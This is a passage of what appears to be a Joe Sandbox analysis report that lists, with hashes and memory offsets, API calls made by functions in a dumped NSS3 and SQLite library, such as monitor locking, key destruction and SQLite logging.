                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1720798025-0
                                                                                                                                                                                                                                                      • Opcode ID: ca9c92290d79d282b163d4c3d6714e3efc47684c6e1964a1283a97144e8886bc
                                                                                                                                                                                                                                                      • Instruction ID: f50506942599283d39f39aa7f748cf5e1143ee77b6f5011a922901c387afe0eb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ca9c92290d79d282b163d4c3d6714e3efc47684c6e1964a1283a97144e8886bc
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 951102B2B01521ABEF00EEA5EC44D96BB2DFF0425A7000225E90997E11E332F534C7E1
                                                                                                                                                                                                                                                      Function 6C502CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C505B40: PR_GetIdentitiesLayer.NSS3 ref: 6C505B56
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C502CEC
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6C502D02
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6C502D1F
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6C502D42
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6C502D5B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1593528140-0
                                                                                                                                                                                                                                                      • Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                                                                                                                                                      • Instruction ID: 631d4fc9a4ffd91310cd5d46b4db2694e9dcc4dee6cdd6649fa00f2a952327f4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 020165F6A142009BE7309E25FC45B87B7A5EB95318F004525E95DC6B20F632FD16C692
                                                                                                                                                                                                                                                      Function 6C502D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C505B40: PR_GetIdentitiesLayer.NSS3 ref: 6C505B56
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C502D9C
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6C502DB2
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6C502DCF
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6C502DF2
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6C502E0B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1593528140-0
                                                                                                                                                                                                                                                      • Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                                                                                                                                                                                      • Instruction ID: e17366f2c83853173c258f244718ddbd8b343a848a70142d6e375df3be6afcfe
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4001A1F2A406009BEB309E26FC05BC7B7A5EB81318F040435E85EC6B20F632FC25C692
                                                                                                                                                                                                                                                      Function 6C49AE30 Relevance: 7.6, APIs: 5, Instructions: 54COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C483090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C49AE42), ref: 6C4830AA
                                                                                                                                                                                                                                                        • Part of subcall function 6C483090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C4830C7
                                                                                                                                                                                                                                                        • Part of subcall function 6C483090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C4830E5
                                                                                                                                                                                                                                                        • Part of subcall function 6C483090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C483116
                                                                                                                                                                                                                                                        • Part of subcall function 6C483090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C48312B
                                                                                                                                                                                                                                                        • Part of subcall function 6C483090: PK11_DestroyObject.NSS3(?,?), ref: 6C483154
                                                                                                                                                                                                                                                        • Part of subcall function 6C483090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C48317E
                                                                                                                                                                                                                                                      • SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6C4799FF,?,?,?,?,?,?,?,?,?,6C472D6B,?), ref: 6C49AE67
                                                                                                                                                                                                                                                      • SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6C4799FF,?,?,?,?,?,?,?,?,?,6C472D6B,?), ref: 6C49AE7E
                                                                                                                                                                                                                                                      • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C472D6B,?,?,00000000), ref: 6C49AE89
                                                                                                                                                                                                                                                      • PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6C472D6B,?,?,00000000), ref: 6C49AE96
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6C472D6B,?,?), ref: 6C49AEA3
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 754562246-0
                                                                                                                                                                                                                                                      • Opcode ID: e5cc729b04a7659f968be7c449c17ec258a42a5e58b5cdf48d52f7635dfc7a2d
                                                                                                                                                                                                                                                      • Instruction ID: 321ad2081eecc3de372e147ef36d63d32fa59c4435700b0cdd8de3b8b6f9dc93
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e5cc729b04a7659f968be7c449c17ec258a42a5e58b5cdf48d52f7635dfc7a2d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E01A966F8503057EB01D16CAC85E9B3B988F9765DF090035E905D7B01FB15D90642E3
                                                                                                                                                                                                                                                      Function 6C58BDB0 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,6C587AFE,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58BDC3
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,6C587AFE,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58BDCA
                                                                                                                                                                                                                                                      • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C587AFE,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58BDE9
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,00000000,00000000,?,6C587AFE,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58BE21
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,00000000,?,6C587AFE,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58BE32
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: free$CriticalDeleteDestroyMonitorSection
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3662805584-0
                                                                                                                                                                                                                                                      • Opcode ID: 341707c39abc3b3aa0be7433ac06a5d32ee60f5f23b627a20c59350e84509f3e
                                                                                                                                                                                                                                                      • Instruction ID: 4c18cc17c99d0bda061c3d777b40529af16c50dd3dd6502fa36b5dcbccf03829
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 341707c39abc3b3aa0be7433ac06a5d32ee60f5f23b627a20c59350e84509f3e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3E11E6B5B027109FDF00DF29CC49B063BB9AB4A254B4A0029D50AC7710E732B914CBAD
                                                                                                                                                                                                                                                      Function 6C587C60 Relevance: 7.5, APIs: 5, Instructions: 40stringthreadCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_Free.NSS3(?), ref: 6C587C73
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C587C83
                                                                                                                                                                                                                                                      • malloc.MOZGLUE(00000001), ref: 6C587C8D
                                                                                                                                                                                                                                                      • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C587C9F
                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6C587CAD
                                                                                                                                                                                                                                                        • Part of subcall function 6C539BF0: TlsGetValue.KERNEL32(?,?,?,6C580A75), ref: 6C539C07
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentFreeThreadValuemallocstrcpystrlen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 105370314-0
                                                                                                                                                                                                                                                      • Opcode ID: aa6d858522c73e0ee2d0b4b5f5ecfcdd687e1f868ac8b6e6eaf190db2a467bd6
                                                                                                                                                                                                                                                      • Instruction ID: 1a4683371a552569a3f9e6e6791d79433ae4bd27287c5d34b2825c5909e2e8b2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aa6d858522c73e0ee2d0b4b5f5ecfcdd687e1f868ac8b6e6eaf190db2a467bd6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DAF0F6F1A11626BFEB009F3A9C09947776CEF502A5B018435EC0DC7B00EB30E514CAE5
                                                                                                                                                                                                                                                      Function 6C58ADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(6C58A6D8), ref: 6C58AE0D
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C58AE14
                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(6C58A6D8), ref: 6C58AE36
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C58AE3D
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,00000000,?,?,6C58A6D8), ref: 6C58AE47
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: free$CriticalDeleteSection
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 682657753-0
                                                                                                                                                                                                                                                      • Opcode ID: dadac7ed899ce4d47329d58581ce90f9b03f57ff5357f8ce2846c9be4c27f540
                                                                                                                                                                                                                                                      • Instruction ID: 63c11e11e136d8b2d8d2b051aedbe2f1fba97aadc62188d5494a53fb8bd7098f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dadac7ed899ce4d47329d58581ce90f9b03f57ff5357f8ce2846c9be4c27f540
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BFF06275202E01A7CA10DFA99C0C95B7778FE86679715032CE52A87980E732F216C7D9
                                                                                                                                                                                                                                                      Function 6C4F9850 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 233COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE001,00000000,?,?), ref: 6C4F9AE4
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Error
                                                                                                                                                                                                                                                      • String ID: ($0@Zl$`@Zl
                                                                                                                                                                                                                                                      • API String ID: 2619118453-2516348057
                                                                                                                                                                                                                                                      • Opcode ID: 55a0d0094c98e3766b7fd2c89971627cfb9fce7cf0cd5a7b7a8b8b040e23e48d
                                                                                                                                                                                                                                                      • Instruction ID: 7e3f0779d9d531b9ac4ac340fe43c3ccb13eeac468ec88b32443db8ac58dc3e7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 55a0d0094c98e3766b7fd2c89971627cfb9fce7cf0cd5a7b7a8b8b040e23e48d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1291E231E042599BDF10EF95C840FEDBBB1BFD8309F248129E8656BB51D3329986CB90
                                                                                                                                                                                                                                                      Function 6C40BCD0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 190COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • sqlite3_mprintf.NSS3(6C5AAAF9,?), ref: 6C40BE37
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: sqlite3_mprintf
                                                                                                                                                                                                                                                      • String ID: Xl$PXl$winFileSize
                                                                                                                                                                                                                                                      • API String ID: 4246442610-4264483736
                                                                                                                                                                                                                                                      • Opcode ID: 0df894d65e209db408c3cabff87dfe561264e712704d576b5caf7f537dea1b31
                                                                                                                                                                                                                                                      • Instruction ID: c42ba40ecc704de23f8c8b1758f564eb428a3e2b006e247af17862188f5a966d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0df894d65e209db408c3cabff87dfe561264e712704d576b5caf7f537dea1b31
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F5619D31B44605EFDB04CF28C890EA9B7B1FF8A314B0586B9D8158BB40D730E956CBD9
                                                                                                                                                                                                                                                      Function 6C417C40 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 100COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A0D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C417D35
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: sqlite3_log
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                      • API String ID: 632333372-598938438
                                                                                                                                                                                                                                                      • Opcode ID: fecea2fb170f99d796c5708334da1392fc63261259db67e9548aef7e977f3120
                                                                                                                                                                                                                                                      • Instruction ID: 814d588682882d07cfb636c79c5a3531f419145f5956a5750f2d5d1a0391170b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fecea2fb170f99d796c5708334da1392fc63261259db67e9548aef7e977f3120
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9A31F471E0C22997C710CF9EC880DBDBBF1AF44345B590196E484B7B85D271E842C7A4
                                                                                                                                                                                                                                                      Function 6C406C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C406D36
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C406D20
                                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6C406D2F
                                                                                                                                                                                                                                                      • database corruption, xrefs: 6C406D2A
                                                                                                                                                                                                                                                      Memory Dump Source
